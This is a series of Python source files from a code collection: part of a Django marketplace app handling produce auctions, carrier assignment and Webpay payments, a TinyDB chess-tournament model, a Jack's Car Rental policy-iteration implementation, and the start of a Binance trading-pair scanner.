ganadores ya no estan disponibles\n productoganador.autor.disponible=False\n #Debe ser un arreglo de productores(pueden ser mas de un productor ganador)\n\n \n postprod= Post_productos.objects.get(post=SolicitudPK, producto=productoganador)\n postprod.cantidad_pujada = cantidaddividida\n postprod.save()\n SolicitudPK.producto.add(productoganador)\n\n\n #ENVIAR CORREO AL PRODUCTOR PARA QUE LLEVE SUS PRODUCTOS A BODEGA\n '''\n pcorreo= productoganador.autor.email\n send_mail(\n 'PRODUCTOR!lleva tus productos a bodega central!',\n 'Tus productos ganaron la subasta, el siguiente paso es llevarlos a bodega central',\n 'maipo_grande@gmail.com',\n [pcorreo],\n fail_silently=False,\n )\n '''\n else:\n print(str(ganador)+' No tiene el precio minimo para participar en la subasta')\n SolicitudPK.save() \n messages.success(request, f'Se ha notificado a los productores para que lleven sus productos a bodega')\n else:\n topcaso3.sort(key = operator.attrgetter('cantidad'),reverse=True)\n print(topcaso3)\n if any(topcaso3):\n cntsumada = 0\n prodpuja= []\n cntprod=[]\n for prod in topcaso3:\n if cntsumada <= cantidadnecesaria:\n cntsumada=cntsumada+prod.cantidad\n print('cantidad prod: '+str(prod.cantidad))\n print('cantidad sumanda: '+str(cntsumada))\n prodpuja.append(prod)\n cntprod.append(prod.cantidad)\n\n if cntsumada >= cantidadnecesaria:\n diffultimo = cntsumada-cantidadnecesaria\n for p in prodpuja:\n if p==prodpuja[-1]:\n SolicitudPK.producto.add(p, through_defaults={'cantidad_pujada':p.cantidad-diffultimo })\n \n else:\n SolicitudPK.producto.add(p, through_defaults={'cantidad_pujada':p.cantidad })\n \n SolicitudPK.cantidad_actual = cantidadnecesaria\n SolicitudPK.EstadoSolicitud = \"4\"\n SolicitudPK.save()\n\n p.cantidad = p.cantidad-p.cantidad \n p.save()\n\n #ENVIAR CORREO AL PRODUCTOR PARA QUE LLEVE SUS PRODUCTOS A BODEGA\n '''\n pcorreo= p.autor.email\n \n send_mail(\n 'PRODUCTOR!lleva tus productos a bodega central!',\n 'Tus productos ganaron la subasta, el siguiente paso es llevarlos a bodega central',\n 'maipo_grande@gmail.com',\n [pcorreo],\n fail_silently=False,\n )\n '''\n diffultimo = cntsumada-cantidadnecesaria\n \n prodpuja[-1].cantidad = prodpuja[-1].cantidad + diffultimo\n prodpuja[-1].save() \n\n \n messages.success(request, f'Se ha notificado al productor para que lleve sus productos a bodega') \n print(SolicitudPK.producto.all()) \n else:\n SolicitudPK.EstadoSolicitud= '3'\n messages.error(request, f'No hay productos suficientes para satisfacer el pedido.')\n print(SolicitudPK.producto.exists())\n if SolicitudPK.producto.exists():\n #SUBASTA DE TRANSPORTE\n '''==TABLA DE TAMAÑOS TRANSPORTISTA==\n TAMAÑO =(\n (\"1\", \"Liviano \"),\n (\"2\", \"Mediano\"),\n (\"3\", \"Pesado\"),\n )\n '''\n #Pallet: 1000 x 1000 mm\n Cajas= 32.0\n cantidad = SolicitudPK.cantidad_necesaria\n pallets=-(-cantidad // Cajas)\n\n tamañonecesario = ''\n if pallets >= 1 and pallets <=12:\n tamañonecesario= '1'\n elif pallets >12 and pallets <=32:\n tamañonecesario= '2'\n elif pallets > 32:\n tamañonecesario = '3'\n\n print(tamañonecesario)\n\n\n transportes=[]\n #Se trae solo a los transportistas disponibles\n transps = User.objects.filter(rol=\"4\",disponible=True)\n print(transps)\n for ut in transps:\n try:\n tg=Transporte.objects.get(transportista=ut,tamaño=tamañonecesario, refrigeracion=refrigeracionnecesaria)\n try:\n if Contrato.objects.get(usuario=ut,vigencia=True):\n transportes.append(tg)\n except Contrato.DoesNotExist:\n print('Transportista '+str(ut.username)+\" no tiene contrato vigente\")\n\n except:\n print('Transportista '+str(ut.username)+\" no califica por disponibilidad/tamaño/refrigeracion\")\n print(transportes)\n try:\n min_tarifa = min(transportes, key=attrgetter('tarifa'))\n except:\n print(\"No hay ningun transportista para calcular el precio minimo \")\n\n\n if len(transportes) >= 1:\n print(transportes)\n tganadores=[]\n for t in transportes:\n if t.tarifa <= min_tarifa.tarifa:\n tganadores.append(t)\n\n tganador=tganadores[0]\n\n print(tganadores)\n if tganador.tarifa <= min_tarifa.tarifa:\n print(str(tganador.tarifa)+str(min_tarifa.tarifa))\n SolicitudPK.transportista = tganador.transportista\n SolicitudPK.transporte = tganador\n #NOTIFICAR AL TRANSPORTISTA DE HABER GANADO LA SUBASTA\n '''\n tcorreo = tganador.transportista.email\n destino = productoganador.autor.direccion\n send_mail(\n 'SUBASTA DE TRANSPORTE ',\n 'Acabas de ganar la subasta de transporte y fuiste seleccionado para transportar los productos:\\nDestino: ',\n 'maipo_grande@gmail.com',\n [tcorreo],\n fail_silently=False,\n )\n '''\n if SolicitudPK.EstadoSolicitud == \"10\":\n SolicitudPK.EstadoSolicitud = \"10\"\n tganador.transportista.disponible=False\n tganador.transportista.save()\n SolicitudPK.save()\n messages.success(request, f'Se ha escogido un transportista adecuado para el envio.')\n elif SolicitudPK.EstadoSolicitud == \"6\":\n SolicitudPK.EstadoSolicitud = \"6\"\n tganador.transportista.disponible=False\n tganador.transportista.save()\n SolicitudPK.save()\n messages.success(request, f'Se ha escogido un transportista adecuado para el envio.')\n else:\n SolicitudPK.EstadoSolicitud = \"5\"\n tganador.transportista.disponible=False\n tganador.transportista.save()\n SolicitudPK.save()\n messages.success(request, f'Se ha escogido un transportista adecuado para el envio.')\n elif len(transportes) == 0:\n print(\"No hay transportistas disponibles en este momento\")\n messages.error(request, f'No hay transportistas que cumplan los requisitos en este momento, vuelve a intentarlo mas tarde.')\n\n '''Solicitud Pendiente'''\n if estadoactual == \"3\":\n SolicitudPK.EstadoSolicitud = '3' \n '''Rechazado'''\n if estadoactual == \"2\":\n SolicitudPK.EstadoSolicitud = '2' \n\n\n SolicitudPK.save() \n return redirect('/Solicitudes')\n else: \n form = FormSolicitudEstado(instance=SolicitudPK) \n context ={'form':form,}\n return render(request, 'modificarsoli.html', context)\ndef modificarSolicitudTransportista(request,pk):\n cart = Cart(request)\n soli= Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = FormSolicitudEstadoTransportista(request.POST,instance=soli)\n if form.is_valid():\n soli = form.save(commit=False)\n soli = Post.objects.get(pk = pk)\n soli.EstadoSolicitud = form.cleaned_data['EstadoSolicitud']\n\n if soli.EstadoSolicitud == \"13\":\n inputdni = request.POST.get('dni')\n\n dni = soli.cliente.dni\n print(dni)\n print(inputdni)\n if dni == inputdni:\n soli.transporte.disponible = True\n soli.save()\n messages.success(request, f'Comprobacion de destinatario correcta')\n return redirect('/solicitudesTransportista')\n else:\n messages.error(request, f'El dni del cliente no coincide con el de la solicitud.')\n \n elif soli.EstadoSolicitud != \"13\":\n soli.save() \n messages.success(request, f'Guardado exitosamente')\n return redirect('/solicitudesTransportista')\n else:\n form = FormSolicitudEstadoTransportista(instance=soli)\n context = { 'form': form }\n return render(request, 'modificarsoli.html', context)\ndef modificarSolicitudRevisor(request, pk):\n cart = Cart(request)\n soli= Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = FormSolicitudEstadoRevisor(request.POST,instance=soli)\n if form.is_valid():\n soli = form.save(commit=False)\n soli = Post.objects.get(pk = pk)\n soli.EstadoSolicitud = form.cleaned_data['EstadoSolicitud']\n soli.save()\n if soli.transportista:\n\n messages.success(request, f'Revision aprobada, el transportista ya puede llevar los productos')\n else:\n messages.warning(request, f'Revision aprobada, pero aun falta asignar un transportista al pedido')\n\n return redirect('/solicitudesRevisor')\n else:\n form = FormSolicitudEstadoRevisor(instance=soli)\n context = { 'form': form }\n return render(request, 'modificarsoli.html', context)\n\ndef modificarSolicitudProductor(request, pk):\n cart = Cart(request)\n\n enbodega=[]\n soli= Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = FormSolicitudEstadoProductor(request.POST,instance=soli)\n if form.is_valid():\n soli = form.save(commit=False)\n soli = Post.objects.get(pk = pk)\n soli.save()\n soli.EstadoSolicitud = form.cleaned_data['EstadoSolicitud']\n if soli.EstadoSolicitud == '6':\n \n for p in soli.producto.all():\n Post_producto =Post_productos.objects.get(post=soli, producto=p)\n if p.autor == request.user:\n Post_producto.enbodega=True\n Post_producto.save()\n enbodega.append(Post_producto.enbodega)\n\n cantprod = len(soli.producto.all())\n n= 0\n for e in enbodega:\n if e == True:\n n=n+1\n if cantprod == n:\n soli.EstadoSolicitud = '6'\n soli.save()\n \n print(cantprod)\n print(n)\n messages.success(request, f'Has avisado que tus productos estan en bodega')\n return redirect('/solicitudesProductor')\n else:\n form = FormSolicitudEstadoProductor(instance=soli)\n context = { 'form': form }\n return render(request, 'modificarsoli.html', context)\ndef modificarSolicitudClienteExterno(request, pk):\n cart = Cart(request)\n soli= Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = FormSolicitudClienteExterno(request.POST,instance=soli)\n if form.is_valid():\n soli = form.save(commit=False)\n soli = Post.objects.get(pk = pk)\n soli.EstadoSolicitud = form.cleaned_data['EstadoSolicitud']\n #SI ELIJE \"PAGAR\" ENTONCES DESPLEGAR EL WEBPAY:\n #CALCULO TOTAL DIVIDIDO ENTRE LOS PRODUCTORES \n if soli.EstadoSolicitud == \"14\":\n totalprods=0\n cantidadprods = len(soli.producto.all())\n cantidaddivida = soli.cantidad_actual//cantidadprods\n for p in soli.producto.all():\n totalprods= totalprods+ (cantidaddivida* p.precio) \n print(totalprods)\n #Se suma la tarifa al total y se agrega la comision (3%)\n total= (soli.transporte.tarifa + totalprods) *1.03\n total = int(total)\n soli.save()\n return redirect('/pagar/'+str(total) +'/'+str(pk))\n \n messages.warning(request, f'Pedido rechazado, se notificará al seguro para su devolución')\n return redirect('/solicitudesClienteExterno')\n else:\n form = FormSolicitudClienteExterno(instance=soli)\n context = { 'form': form }\n return render(request, 'modificarsoli.html', context)\ndef registrarTransporte (request):\n cart = Cart(request)\n if request.method == 'POST':\n form = FormRegistrarTransporte(request.POST)\n if form.is_valid():\n transp = form.save(commit=False)\n transp.transportista = request.user\n transp.save()\n messages.success(request, f'Transporte Registrado')\n return redirect('/registrarTransporte')\n else:\n form = FormRegistrarTransporte()\n context = { 'form': form }\n return render(request, 'registrarTransporte.html', context)\n\ndef transportesRegistrados(request):\n cart = Cart(request)\n transp = Transporte.objects.filter(transportista=request.user)\n context={'transp':transp}\n\n return render(request, 'transportesRegistrados.html', context)\n\n\n\n\ndef Ventalocal(request):\n cart = Cart(request)\n products = Producto.objects.filter(Saldo=True)\n context={'products':products}\n cart = Cart(request)\n return render(request, 'Venta-local.html', context )\n\n\n'''Carrito funcional'''\n\n@csrf_protect\ndef add_product_catalogo(request, product_id):\n cart = Cart(request)\n cantidadacomprar=0\n product = Producto.objects.get(pk=product_id)\n\n for (key, value) in request.session['cart'].items():\n print(value['product_id'])\n print(product.pk)\n if value['product_id'] == product.pk: \n cantidadacomprar= product.cantidad- int(value['quantity'])\n if cantidadacomprar > 0:\n cart.add(product=product)\n messages.success(request, f'{product.get_producto_display()} agregado al carrito')\n else:\n messages.warning(request, f'No quedan mas unidades de este producto') \n\n return redirect(\"/Venta-local\")\n\n\ndef add_product_carrito(request, product_id):\n cart = Cart(request)\n product = Producto.objects.get(id=product_id)\n cart.add(product=product)\n return redirect(\"/carrito.html\")\n\n\n\n\n@csrf_protect\ndef remove_product(request, product_id):\n cart = Cart(request)\n product = Producto.objects.get(id=product_id)\n cart.remove(product)\n return redirect(\"/carrito.html\")\n\n\n@csrf_protect\ndef decrement_product(request, product_id):\n cart = Cart(request)\n product = Producto.objects.get(id=product_id)\n cart.decrement(product=product)\n return redirect(\"/carrito.html\")\n\n\n@csrf_protect\ndef clear_cart(request):\n cart = Cart(request)\n cart.clear()\n return redirect(\"/carrito.html\")\n\ndef webpay(request):\n cart = Cart(request)\n total = 0\n FprecioC = 0\n cart = Cart(request)\n buy_order = str(1)\n session_id = str(1)\n return_url = 'http://127.0.0.1:8000/terminarsaldo'\n total = 0\n FprecioC = 0\n if request.user.is_authenticated:\n for key, value in request.session['cart'].items():\n total = total + (float(value['price']) * value['quantity'])\n # FprecioC=(f'{total:.3f}')\n FprecioC= int(total)\n amount = FprecioC\n try:\n response = Transaction().create(buy_order, session_id, amount, return_url)\n print(amount)\n return render(request, 'carrito.html', {\"response\":response})\n except TransbankError as e:\n print(e.message)\n return render(request, 'carrito.html', {})\n\n\ndef webpaycommit(request):\n cart = Cart(request)\n productos= []\n cantidades=[]\n for key,value in request.session['cart'].items():\n \n cantidadpujada = int(value['quantity'])\n id = value['product_id']\n\n product = Producto.objects.get(pk=id) \n product.cantidad= product.cantidad-cantidadpujada\n \n \n \n productos.append([product, cantidadpujada])\n\n\n print(productos)\n token = request.GET.get(\"token_ws\")\n response = Transaction().commit(token) \n response['transaction_date'] = datetime.strptime(response['transaction_date'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n\n return render(request, 'terminarsaldo.html',{\"token\": token,\"response\": response, \"productos\":productos})\n \n\ndef webpayplus_reembolso(request):\n cart = Cart(request)\n token = request.POST.get(\"token_ws\")\n amount = request.POST.get(\"amount\")\n try:\n response = Transaction().refund(token, amount)\n print(response)\n print(token)\n return render(request, 'reembolso.html', {\"token\":token, \"amount\": amount, \"response\":response})\n except TransbankError as e:\n print(e.message)\n return render(request, 'reembolso.html', {})\n\ndef webpayplus_anular(request):\n cart = Cart(request)\n return render(request, 'anular.html', {})","repo_name":"zexza/FeriaMovil","sub_path":"feriavirtual/feriavirtualapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":49560,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17305911659","text":"from tinydb import TinyDB\n\ntournoi_bdd = TinyDB('models/tournoi.json')\n\nclass Tournoi:\n \"\"\"creer une instance de tournoi\"\"\"\n\n def __init__(self, nom_tournoi=None,\n lieu_tournoi=None,\n date_tournoi=None,\n nombre_de_tour_tournoi=4,\n liste_des_tours=None,\n controle_du_temps=None,\n identifiants_joueurs_tournoi=None,\n identifiant_tournoi=None,\n description_tournoi=None\n ):\n self.nom_tournoi = nom_tournoi\n self.lieu_tournoi = lieu_tournoi\n self.date_tournoi = date_tournoi\n self.nombre_de_tour_tournoi = nombre_de_tour_tournoi\n self.liste_des_tours = liste_des_tours\n self.controle_du_temps = controle_du_temps\n self.identifiants_joueur = identifiants_joueurs_tournoi\n self.identifiant_tournoi = identifiant_tournoi\n self.description_tournoi = description_tournoi\n\n def serialiser_tournoi(self):\n dico_donnees_tournoi = {}\n dico_donnees_tournoi[\"nom tournoi\"] = self.nom_tournoi\n dico_donnees_tournoi[\"lieu tournoi\"] = self.lieu_tournoi\n dico_donnees_tournoi[\"date tournoi\"] = self.date_tournoi\n dico_donnees_tournoi[\"nombre de tour tournoi\"] = self.nombre_de_tour_tournoi\n dico_donnees_tournoi[\"liste de tour tournoi\"] = self.liste_des_tours\n dico_donnees_tournoi[\"controle du temps\"] = self.controle_du_temps\n #dico_donnees_tournoi[\"identifiants des joueurs du tournoi\"] = self.identifiants_joueurs_tournoi\n #dico_donnees_tournoi[\"identifiant du tournoi\"] = self.identifiant_tournoi\n #dico_donnees_tournoi[\"description du tournoi\"] = self.description_tournoi\n return dico_donnees_tournoi\n\n def deserialiser_tournoi(self, tournoi_serialise):\n nom_tournoi = tournoi_serialise[\"nom tournoi\"]\n lieu_tournoi = tournoi_serialise[\"lieu tournoi\"]\n date_tournoi = tournoi_serialise[\"date tournoi\"]\n nombre_de_tour_tournoi = tournoi_serialise[\"nombre de tour tournoi\"]\n liste_des_tours = tournoi_serialise[\"liste de tour tournoi\"]\n controle_du_temps = tournoi_serialise[\"controle du temps\"]\n identifiants_joueurs_tournoi = tournoi_serialise[\"identifiants des joueurs du tournoi\"]\n identifiant_tournoi = tournoi_serialise[\"identifiant du tournoi\"]\n description_tournoi = tournoi_serialise[\"description du tournoi\"]\n return Tournoi(nom_tournoi, lieu_tournoi, date_tournoi, nombre_de_tour_tournoi, liste_des_tours,\n controle_du_temps, identifiants_joueurs_tournoi, identifiant_tournoi, description_tournoi)\n\n def ajouter_tournoi_bdd(self, dico_donnees_tournoi):\n self.tournoi = Tournoi(dico_donnees_tournoi[\"nom tournoi\"],\n dico_donnees_tournoi[\"lieu tournoi\"],\n dico_donnees_tournoi[\"date tournoi\"],\n dico_donnees_tournoi[\"nombre de tour tournoi\"],\n dico_donnees_tournoi[\"controle du temps\"],\n dico_donnees_tournoi[\"description du tournoi\"]\n #dico_donnees_tournoi[\"identifiants des joueurs du tournoi\"]\n )\n identifiant_tournoi = tournoi_bdd.insert(self.tournoi.serialiser_tournoi())\n tournoi_bdd.update({\"id\": identifiant_tournoi}, doc_ids=[identifiant_tournoi])\n\n\nclass Tour:\n \"\"\"creer une instance de tour\"\"\"\n\n def __init__(self, nom_tour=None,\n date_debut_tour=None,\n date_fin_tour=None,\n liste_de_match_fini=None):\n if liste_de_match_fini is None:\n liste_de_match_fini = []\n self.nom_tour = nom_tour\n self.date_debut_tour = date_debut_tour\n self.date_fin_tour = date_fin_tour\n self.liste_de_match_fini = liste_de_match_fini\n","repo_name":"mica12/P04","sub_path":"models/tournoi_model.py","file_name":"tournoi_model.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17144353017","text":"\nimport numpy as np\nfrom scipy.stats import poisson\nimport matplotlib.pyplot as plt\nimport itertools\nimport copy\n\nclass CarRental:\n \"\"\" Implementation of Jack's Car Rental enviornment, example 4.2 of\n Chapter 4 of \"Reinforcement Learning, an Introduction\" by Sutton and\n Barto. \n\n Jack manages a car rental at two locations. Each day, a random\n number of customers arrive at each location to rent cars, and a\n random number of cars get returned at each location. The numbers are\n drawn from a Poisson distribution. Jack makes profit for each car that is\n rented, but if he does not have a car at a location when requested, then\n that business is lost. In order to ensure cars are avaliable when requested,\n he can move some number of cars between the two locations over night. Cars\n that are returned are avaliable for rental the following day.\n \"\"\"\n def __init__(self, max_cars, max_move, move_car_cost, free_move, parking_penalty,\n rent_credit, lmbda1_rent, lmbda2_rent, lmbda1_rtn,\n lmbda2_rtn, max_limit):\n \"\"\" Initializes the car rental.\n\n @type max_cars: int\n Maximum number of cars at each rental location at any given time.\n Any extra cars that arrive are returned to a distribution center and\n disappear from the problem.\n @type max_move: int\n The maximum number of cars Jack can move from one place to another per\n night.\n @type move_car_cost: int\n The cost for moving each car between locations over night.\n @type free_move: int\n The number of free moves from location 1 to location 2 per night.\n @type parking_penalty: int\n Penalty incurred for each location when the number of cars there\n exceeds 10.\n @type rent_credit: int\n The profit per car rented out.\n @type lmbda1_rent: int\n The average value of the poission distribution for rentals at location 1.\n @type lmbda2_rent: int\n The average value of the poission distribution for rentals at location 2.\n @type lmbda1_rtn: int\n The average value of the poission distribution for returns at location 1.\n @type lmbda2_rtn: int\n The average value of the poission distribution for returns at location 2.\n @type max_limit: int\n The maximum number of rentals and returns considered when computing state\n transition probabilities.\n\n \"\"\"\n self.max_cars = max_cars\n self.max_move = max_move\n self.free_move = free_move\n self.parking_penalty = parking_penalty\n self.move_car_cost = move_car_cost\n self.rent_credit = rent_credit\n self.lmbda1_rent = lmbda1_rent\n self.lmbda2_rent = lmbda2_rent\n self.lmbda1_rtn = lmbda1_rtn\n self.lmbda2_rtn = lmbda2_rtn\n self.probs = np.zeros((max_limit+1,max_limit+1,max_limit+1,max_limit+1))\n\n for rent1, rent2, rtn1, rtn2 in itertools.product(range(max_limit+1), repeat = 4):\n p_rent1 = poisson.pmf(rent1, self.lmbda1_rent)\n p_rent2 = poisson.pmf(rent2, self.lmbda2_rent)\n p_rtn1 = poisson.pmf(rtn1, self.lmbda1_rtn)\n p_rtn2 = poisson.pmf(rtn2, self.lmbda2_rtn)\n self.probs[rent1, rent2, rtn1, rtn2] = p_rent1 * p_rent2 * p_rtn1 * p_rtn2\n\n\n\n def getProb(self, rent1, rent2, rtn1, rtn2):\n \"\"\" Gets the probability of the state transition given the number of\n rentals and returns at each location during a day.\n\n @type rent1: int\n Number of cars rented out in location 1.\n @type rent2: int\n Number of cars rented out in location 2.\n @type rtn1: int\n Number of cars returned in location 1.\n @type rtn2: int\n Number of cars returned in location 2.\n @rtype: float\n Probability of transition.\n \"\"\"\n return self.probs[rent1, rent2, rtn1, rtn2]\n \n\n def getNextState(self, rent1, rent2, rtn1, rtn2, n1, n2, moved):\n \"\"\" Gets the next state given the current state, number of\n cars moved over night, and the number of rentals and returns\n at each location during the following day.\n\n @type rent1: int\n Number of cars rented out in location 1.\n @type rent2: int\n Number of cars rented out in location 2.\n @type rtn1: int\n Number of cars returned in location 1.\n @type rtn2: int\n Number of cars returned in location 2.\n @type n1: int\n Number of cars currently at location 1.\n @type n2: int\n Number of cars currently at location 2.\n @type moved: int\n Number of cars moved from location 1 to 2 over night.\n If moved < 0, then it representents moving from 2 to 1.\n @rtype: tuple[int]\n A tuple of 2 numbers representing the number of cars\n at location 1 and 2 at the end of the following day.\n \n \"\"\"\n \n if moved >= 0: moved = min(n1, moved)\n else: moved = - min(n2, -moved)\n\n new_n1 = max(0, n1 - moved - rent1)\n new_n2 = max(0, min(n2 + moved, self.max_cars) - rent2)\n\n return int(min(new_n1 + rtn1, self.max_cars)), int(min(new_n2 + rtn2, self.max_cars))\n\n def getReward(self, rent1, rent2, n1, n2, moved):\n \"\"\" Gets the reward given the current state, tne number of cars moved over night,\n and the number of rentals in the following day.\n\n @type rent1: int\n Number of cars rented out in location 1.\n @type rent2: int\n Number of cars rented out in location 2.\n @type n1: int\n Number of cars currently at location 1.\n @type n2: int\n Number of cars currently at location 2.\n @type moved: int\n Number of cars moved from location 1 to 2 over night.\n If moved < 0, then it representents moving from 2 to 1.\n @rtype: int\n Reward value\n \"\"\"\n if moved >= 0: moved = min(n1, moved)\n else: moved = - min(n2, -moved)\n \n reward = 0\n reward += min(rent1, n1 - moved)*self.rent_credit\n reward += min(rent2, min(n2 + moved, self.max_cars))*self.rent_credit\n\n if moved > self.free_move: reward -= (moved - self.free_move)*self.move_car_cost\n elif moved < 0: reward -= abs(moved)*self.move_car_cost\n\n if n1 - moved > 10: reward -= self.parking_penalty\n if n2 + moved > 10: reward -= self.parking_penalty\n\n return reward\n \nclass PolicyEvaluation:\n \"\"\"Iterative Policy Evaluation\n\n A class to find the state value function given a determinstic policy.\n \n \"\"\"\n \n def __init__(self, max_cars, pi, R, t, p, gamma, threshold, max_limit, V0):\n \"\"\" Initializes the IPE\n\n @type max_cars: int\n Maximum number of cars at each location\n @type pi: function(n1, n2) -> int\n The policy for which the state value function is to\n be evaluated. The policy takes as input n1, n2 representing\n the number of cars at locations 1 and 2, and outputs the number\n of cars to move from 1 to 2.\n @type R: function(rent1, rent2, n1, n2, moved) -> int\n The reward function. Outputs the reward.\n @type t: function(rent1, rent2, rtn1, rtn2, n1, n2, moved) -> tuple[int]\n The state transition function. Outputs the next state.\n @type p: function(rent1, rent2, rtn1, rtn2) -> float\n The probability of a state transition.\n @type gamma: float\n The discount factor\n @type threshold: float\n The threshold tolerance for the state value function. The\n iteration will terminate when the maximum difference in the\n state value function across all states between two successive\n iterations is smaller than threshold.\n @type max_limit: int\n The maximum number of rentals and returns considered when computing state\n transition probabilities.\n @type V0: array[float]\n The initial state values, where V0[n1][n2] is the state value for n1 and n2\n cars at location 1 and 2 respectively.\n \n \"\"\"\n self.t = t\n self.R = R\n self.p = p\n self.pi = pi\n self.V = V0\n self.gamma = gamma\n self.threshold = threshold\n self.max_limit = max_limit\n\n def train(self):\n \"\"\" Performs iterative policy evaluation until the difference in\n values across all states between two successive iterations is less\n than a threshold.\n\n \"\"\"\n delta = float('inf')\n\n tuples = [(a,b,c,d) for a,b,c,d in itertools.product(range(self.max_limit+1), repeat = 4)]\n \n while delta >= self.threshold:\n delta = 0\n for n1 in range(max_cars+1):\n for n2 in range(max_cars+1):\n v = self.V[n1][n2]\n \n moved = self.pi[n1][n2]\n\n new_v = 0.0 \n for rent1, rent2, rtn1, rtn2 in tuples:\n \n new_n1, new_n2 = self.t(rent1, rent2, rtn1, rtn2, n1, n2, moved)\n prob = self.p(rent1, rent2, rtn1, rtn2)\n r = self.R(rent1, rent2, n1, n2, moved)\n \n new_v += prob*(r + self.gamma * self.V[new_n1][new_n2])\n\n\n self.V[n1][n2] = new_v\n delta = max(delta, abs(v-new_v))\n print('Current Delta is: ', delta)\n\n \n\n \n def getValues(self):\n \"\"\" Returns the current values for each state\n @rtype: list[float]\n \"\"\"\n return self.V\n\nclass PolicyImprovement:\n \"\"\" Given a state value function, improves the policy greedily by choosing\n an action providing the highest value for the subsequent state.\n\n \"\"\"\n def __init__(self, V, max_move, R, t, p, gamma, max_limit):\n \"\"\" Initializes the policy improvement\n\n @type V: array[float]\n The state values, where V[n1][n2] is the state value for n1 and n2\n cars at location 1 and 2 respectively.\n @type max_move: int\n The maximum number of cars that can be moved from one location to\n the other in one night.\n @type R: function(rent1, rent2, n1, n2, moved) -> int\n The reward function. Outputs the reward.\n @type t: function(rent1, rent2, rtn1, rtn2, n1, n2, moved) -> tuple[int]\n The state transition function. Outputs the next state.\n @type p: function(rent1, rent2, rtn1, rtn2) -> float\n The probability of a state transition.\n @type gamma: float\n The discount factor\n @type max_limit: int\n The maximum number of rentals and returns considered when computing state\n transition probabilities.\n \n \"\"\"\n self.V = V\n self.pi = np.zeros(np.shape(self.V))\n self.max_move = max_move\n self.R = R\n self.t = t\n self.p = p\n self.gamma = gamma\n self.max_limit = max_limit\n\n def improve(self):\n \"\"\" Constructs a policy by taking the action at each state that maximizes the\n state value for the subsequent state.\n \"\"\"\n \n tuples = [(a,b,c,d) for a,b,c,d in itertools.product(range(self.max_limit+1), repeat = 4)]\n \n for n1 in range(len(self.V)):\n for n2 in range(len(self.V[0])):\n rewards = []\n for action in range(-min(self.max_move, n2), min(self.max_move, n1)+1):\n v = 0\n for rent1, rent2, rtn1, rtn2 in tuples:\n\n new_n1, new_n2 = self.t(rent1, rent2, rtn1, rtn2, n1, n2, action)\n prob = self.p(rent1, rent2, rtn1, rtn2)\n r = self.R(rent1, rent2, n1, n2, action)\n \n v += prob * (r + self.gamma * self.V[new_n1][new_n2])\n \n rewards.append(v)\n \n self.pi[n1][n2] = rewards.index(max(rewards)) - min(self.max_move, n2)\n\n def getPolicy(self):\n \"\"\" Gets the current policy\n\n @rtype: array[int]\n The current policy pi, where pi[n1][n2] is the number of cars\n to be moved over night when the current number of cars is n1, n2\n at locations 1 and 2 respectively.\n \"\"\"\n return self.pi\n\n\n \n \n \nif __name__ == \"__main__\":\n \n max_cars = 20\n max_move = 5\n free_move = 0\n parking_penalty = 0\n move_car_cost = 2\n rent_credit = 10\n \n lmbda1_rent = 3\n lmbda2_rent = 4\n lmbda1_rtn = 3\n lmbda2_rtn = 2\n\n gamma = 0.9\n threshold = 1\n max_limit = 10\n\n # Car rental enviornment\n rental = CarRental(max_cars, max_move, free_move, parking_penalty,\n move_car_cost, rent_credit, lmbda1_rent, lmbda2_rent, lmbda1_rtn,\n lmbda2_rtn, max_limit)\n\n\n # Initializing state values and policy\n V = np.zeros((max_cars+1, max_cars+1))\n pi = np.zeros((max_cars+1, max_cars+1))\n\n # Number of cycles to run\n cycles = 5\n \n for cycle in range(cycles):\n\n print(\"Current cycle: \", cycle + 1)\n\n # Policy Evaluation\n PE = PolicyEvaluation(max_cars, pi, rental.getReward, rental.getNextState, rental.getProb, gamma, threshold, max_limit, copy.deepcopy(V))\n\n PE.train()\n\n print(\"Policy evaluated!\")\n\n # Policy Improvement\n new_V = PE.getValues()\n\n PI = PolicyImprovement(new_V, max_move, rental.getReward, rental.getNextState, rental.getProb, gamma, max_limit)\n\n PI.improve()\n\n print(\"Policy improved!\")\n \n pi = PI.getPolicy()\n\n V = new_V\n\n # Plotting final results\n plt.figure()\n plt.imshow(pi, origin='lower', interpolation='none')\n plt.title(\"Final Policy\")\n plt.xlabel(\"# of cars at location 1\")\n plt.ylabel(\"# of cars at location 2\")\n\n plt.figure()\n plt.imshow(V, origin='lower', interpolation='none')\n plt.title(\"Final Value Function\")\n plt.xlabel(\"# of cars at location 1\")\n plt.ylabel(\"# of cars at location 2\")\n \n plt.show()\n","repo_name":"lolcharles2/Reinforcement_learning_book_implementations","sub_path":"Ch4/jacks_car_rental.py","file_name":"jacks_car_rental.py","file_ext":"py","file_size_in_byte":15096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10125637370","text":"# !/usr/bin/env python3\n# This script uses \n# %% BINANCE SCANNER\nimport asyncio\nimport json\nimport pprint\nimport time\nfrom datetime import datetime\npp = pprint.PrettyPrinter(indent=4)\nfrom websocket import create_connection\nfrom importlib import reload\nfrom numpy import diff\nimport statistics\nimport pandas as pd\nimport statistics\nimport trader\n\n# Apply rolling windows as smoothing\nn = 120\n# Use this as timeframe for trading. --> \nGETSOME = 10\n\nreload(trader)\n# Create the \nbinance = trader.biance_api()\n# Get a file object with write permission.\nfile_object = open('binance_pairs.txt', 'r')\n# Load JSON file data to a python dict object.\ndict_object = json.load(file_object)\n\nscanner = {}\nnumber_of_trades_per_minutes = {}\n\nbest = None\nworst = None\nhighest_variance = None\nhighest_std_dev = None\n\nfor pair in dict_object['unique_pairs']:\n # print(f'Scanning --> {pair}')\n\n pair_list = []\n num_trades_list = []\n klineDate = binance.get_kline_timeframe(pair, timeframe='1m')\n for kline in klineDate:\n # print('open', kline[1])\n # 8 is index for volume, 2 is index for open price?\n pair_list.append(float(kline[2]))\n num_trades_list.append(float(kline[8]))\n \n mean_numberofTrades = statistics.mean(num_trades_list)\n number_of_trades_per_minutes[pair] = mean_numberofTrades\n \n if mean_numberofTrades < 16:\n continue\n print(f'Scanning --> {pair}')\n\n # 